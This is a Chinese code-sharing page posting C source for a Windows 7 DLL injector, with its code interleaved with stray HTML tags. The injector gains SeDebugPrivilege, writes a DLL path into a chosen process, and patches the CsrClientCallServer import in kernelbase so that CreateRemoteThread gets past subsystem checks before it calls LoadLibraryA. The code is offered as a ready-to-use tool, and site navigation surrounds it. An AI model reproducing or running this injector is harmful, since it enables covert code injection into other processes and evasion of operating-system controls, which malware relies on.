网站首页
网站导航
Ctrl+D收藏
首 页
代码段
源码包
文档库
工具箱
代码语言
.
CSharp
.
JS
Java
Asp.Net
C
MSSQL
PHP
Css
PLSQL
Python
Shell
EBS
ASP
Perl
ObjC
VB.Net
VBS
MYSQL
GO
Delphi
AS
DB2
Domino
Rails
ActionScript
Scala
代码分类
文件
系统
字符串
数据库
网络相关
图形/GUI
多媒体
算法
游戏
Jquery
Extjs
Android
HTML5
菜单
网页交互
WinForm
控件
企业应用
安全与加密
脚本/批处理
开放平台
其它
【
C
】
Win7创建远程线程
作者:
DDT
/ 发布于
2012/10/8
/
478
#include <windows.h></div> <div> BOOL APIENTRY DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) { CHAR Buff[256]; switch(dwReason) { case DLL_PROCESS_ATTACH: _snprintf(Buff, sizeof(Buff)-1, "[*] DLL injected into process %u\n", GetCurrentProcessId()); OutputDebugString(Buff); //__asm int 3 break; default: break; } return TRUE; } <div></div> <div></div> <div></div> <div>define WIN32_LEAN_AND_MEAN #include <windows.h> #include <strsafe.h> #include <stdio.h> #include <stdlib.h></div> <div>pragma comment (lib, "advapi32.lib")</div> <div>DWORD GetDebugPrivilege() { HANDLE hToken; DWORD Ret=1; TOKEN_PRIVILEGES TP;</div> if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { printf("[-] Error in GetDebugPrivilege OpenProcessToken: %u\n", GetLastError()); Ret=0; goto bye; } if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &TP.Privileges[0].Luid)) { printf("[-] Error in GetDebugPrivilege LookupPrivilegeValue: %u\n", GetLastError()); Ret=0; goto bye; } TP.PrivilegeCount=1; TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken, FALSE, &TP, 0, NULL, NULL)) { printf("[-] Error in GetDebugPrivilege with AdjustTokenPrivileges: %u\n", GetLastError()); Ret=0; goto bye; } bye: CloseHandle(hToken); return Ret; } <div> /* kernelbase.dll 7597BD24 6A 0C PUSH 0C 7597BD26 68 01000100 PUSH 10001 7597BD2B 53 PUSH EBX 7597BD2C 8D85 F0FDFFFF LEA EAX, DWORD PTR SS:[EBP-210] 7597BD32 50 PUSH EAX 7597BD33 FF15 00129775 CALL NEAR DWORD PTR DS:[<&ntdll.CsrClientCallServer>] ; ntdll.CsrClientCallServer 7597BD39 8B85 10FEFFFF MOV EAX, DWORD PTR SS:[EBP-1F0] 7597BD3F 8985 E8FDFFFF MOV DWORD PTR SS:[EBP-218], EAX 7597BD45 399D E8FDFFFF CMP DWORD PTR SS:[EBP-218], EBX 7597BD4B 0F8C 13D80100 JL KERNELBA.75999564 */</div> <div>DWORD __stdcall MyCsrClientCallServer(PVOID Arg1, PVOID Arg2, DWORD Arg3, DWORD Arg4) { *(PDWORD)((PBYTE)Arg1+0x20)=0; return 0; } <div> DWORD ScanIatForImportAddress(HANDLE hModule, PCHAR Import) { PIMAGE_DOS_HEADER DosHeader; PIMAGE_NT_HEADERS NtHeader; PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor; PIMAGE_THUNK_DATA OriginalThunk; PDWORD FirstThunk; PIMAGE_IMPORT_BY_NAME ImportByName; PCHAR Name; DWORD i; if(hModule==NULL || Import==NULL) return 0; DosHeader=(PIMAGE_DOS_HEADER)hModule; NtHeader=(PIMAGE_NT_HEADERS)((PBYTE)hModule+DosHeader->e_lfanew); ImportDescriptor=(PIMAGE_IMPORT_DESCRIPTOR)((PBYTE)hModule+NtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); while(*(PDWORD)ImportDescriptor!=0) { //printf("[*] Module : %s\n", ((PBYTE)hModule+ImportDescriptor->Name)); OriginalThunk=(PIMAGE_THUNK_DATA)((PBYTE)hModule+ImportDescriptor->OriginalFirstThunk); FirstThunk=(PDWORD)((PBYTE)hModule+ImportDescriptor->FirstThunk); i=0; while(*(PDWORD)OriginalThunk!=0) { ImportByName=(PIMAGE_IMPORT_BY_NAME)((PBYTE)hModule+OriginalThunk->u1.AddressOfData); Name=(PCHAR)((PBYTE)ImportByName+sizeof(WORD)); //printf("[*] ImportName(%u): %s\n", ImportByName->Hint, Name); if(_stricmp(Name, Import)==0) return (DWORD)&FirstThunk[i++]; OriginalThunk++; i++; } ImportDescriptor++; } return 0; } <div> HANDLE WINAPI MyCreateRemoteThread( __in HANDLE hProcess, __in LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in LPVOID lpParameter, __in DWORD dwCreationFlags, __out LPDWORD lpThreadId ) { HANDLE hThread; DWORD ImportAddress, OriginalCsrClientCallServer, OldProtect;</div> <div>ImportAddress=ScanIatForImportAddress(GetModuleHandle("kernelbase.dll"), "CsrClientCallServer"); if(ImportAddress==0) { printf("[-] Error in MyCreateRemoteThread with ScanIatForThunk : Cannot find thunk address\n"); return NULL; } printf("[*] CsrClientCallServer import address at : 0x%x\n", ImportAddress); VirtualProtect((PVOID)ImportAddress, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &OldProtect); OriginalCsrClientCallServer=*(PDWORD)ImportAddress; *(PDWORD)ImportAddress=(DWORD)MyCsrClientCallServer; hThread=CreateRemoteThread(hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId); if(hThread==NULL) { printf("[-] Error in MyCreateRemoteThread with CreateRemoteThread : %u\n", GetLastError()); return NULL; } *(PDWORD)ImportAddress=OriginalCsrClientCallServer; VirtualProtect((PVOID)ImportAddress, sizeof(DWORD), OldProtect, &OldProtect);</div> <div>return hThread; } <div> BOOLEAN InjectDll(DWORD Pid, LPTSTR DllName) { DWORD ThreadID; HANDLE hThread; HANDLE hProcess; DWORD InjectSize; LPVOID Arg; LPTHREAD_START_ROUTINE Injector; CHAR FullDllPath[MAX_PATH]; RtlZeroMemory(FullDllPath, sizeof(FullDllPath)); GetCurrentDirectory(sizeof(FullDllPath)-sizeof(CHAR), FullDllPath); StringCbCat(FullDllPath, sizeof(FullDllPath)-strlen(FullDllPath)-sizeof(CHAR), "\\"); StringCbCat(FullDllPath, sizeof(FullDllPath)-strlen(FullDllPath)-sizeof(CHAR), DllName); printf("[*] FullDllPath : %s\n", FullDllPath);</div> if(!GetDebugPrivilege()) { printf("[-] Error in InjectDll with GetDebugPrivilege : Cannot grant SeDebugPrivilege\n"); return FALSE; } <div>hProcess=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION, FALSE, Pid); if(hProcess==NULL) { printf("[-] Error in InjectDll with OpenProcess : %u\n", GetLastError()); return FALSE; } InjectSize=strlen(FullDllPath)+1;</div> <div>Arg=VirtualAllocEx(hProcess, NULL, InjectSize, MEM_COMMIT, PAGE_READWRITE); if(Arg==NULL) { printf("[-] Error in InjectDll with VirtualAllocEx : %u\n", GetLastError()); CloseHandle(hProcess); return FALSE; } if(WriteProcessMemory(hProcess, Arg, FullDllPath, InjectSize, 0)==FALSE) { printf("[-] Error in InjectDll with WriteProcessMemory : %u\n", GetLastError()); CloseHandle(hProcess); return FALSE; } <div>Injector=(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); hThread=MyCreateRemoteThread(hProcess, NULL, 0, Injector , Arg, 0, &ThreadID); if(hThread==NULL) { printf("[-] Error in InjectDll with MyCreateRemoteThread : %u\n", GetLastError()); CloseHandle(hProcess); return FALSE; } if(WaitForSingleObject(hThread, INFINITE)==WAIT_FAILED) { printf("[-] Error in InjectDll with WaitForSingleObject : %u\n", GetLastError());</div> <div>CloseHandle(hProcess); CloseHandle(hThread); return FALSE; } if(VirtualFreeEx(hProcess, Arg, 0, MEM_DECOMMIT)==FALSE) { printf("[-] Error in InjectDll with VirtualFreeEx : %u\n", GetLastError());</div> <div>CloseHandle(hProcess); CloseHandle(hThread); return FALSE; } <div>CloseHandle(hProcess); CloseHandle(hThread);</div> <div>return TRUE; } <div> int __cdecl main(int argc, char * argv[]) { DWORD Pid; printf("Custom CreateRemoteThread() which bypass subsystem control\nBy Ivanlef0u\nBE M4D !\n\n"); if(argc<3) { printf("Usage is : %s <pid> <dll name>\n"); return 0; } Pid=strtoul(argv[1], NULL, 10); if(Pid==0 || Pid==4) return 0; InjectDll(Pid, argv[2]); printf("[+] Dll successfully injected !\n"); return 0; }
评论列表
本站所提供的代码,版权归原作者所有,若有侵犯作者版权,请与我们联系,我们将立即删除或修改。谢谢!
本站所有代码发布及提供者。
试试其它关键字
创建远程线程
同语言下
.
获取手机通讯录 iOS去除数字以外的所有字符
.
异步加载音乐等资源
.
交通罚单管理系统
.
freemark实现,简单的替换
.
计算斐波那契数列
.
base64解码 包括解码长度
.
图像显示
.
冒泡排序
.
输入十进制数,输出指定进制
.
链式栈
可能有用的
.
SQL查询 多列合并成一行用逗号隔开
.
一行一行读取txt的内容
.
C#动态修改文件夹名称(FSO实现,不移动文件)
.
c# 移动文件或文件夹
.
c#图片添加水印
.
Java PDF转换成图片并输出给前台展示
.
网站后台修改图片尺寸代码
.
处理大图片在缩略图时的展示
.
实现对图片上传的接收
.
判断用户输入的是否为IP地址
DDT
贡献的其它代码
(
160
)
.
Oracle统计表的数据行和数据块信息
.
html标签闭合检测与修复
.
Powershell日期计算
.
Powershell的Base64编解码
.
Powershell并行循环
.
Powershell目录中搜索文本
.
Powershell枚举远程机器上的本地权限组
.
VBScript解析csv文件
.
快速排序之Powershell
.
批处理输出格式化时间字符串
地图
本站
我们
服务
版权
联系
回馈
博客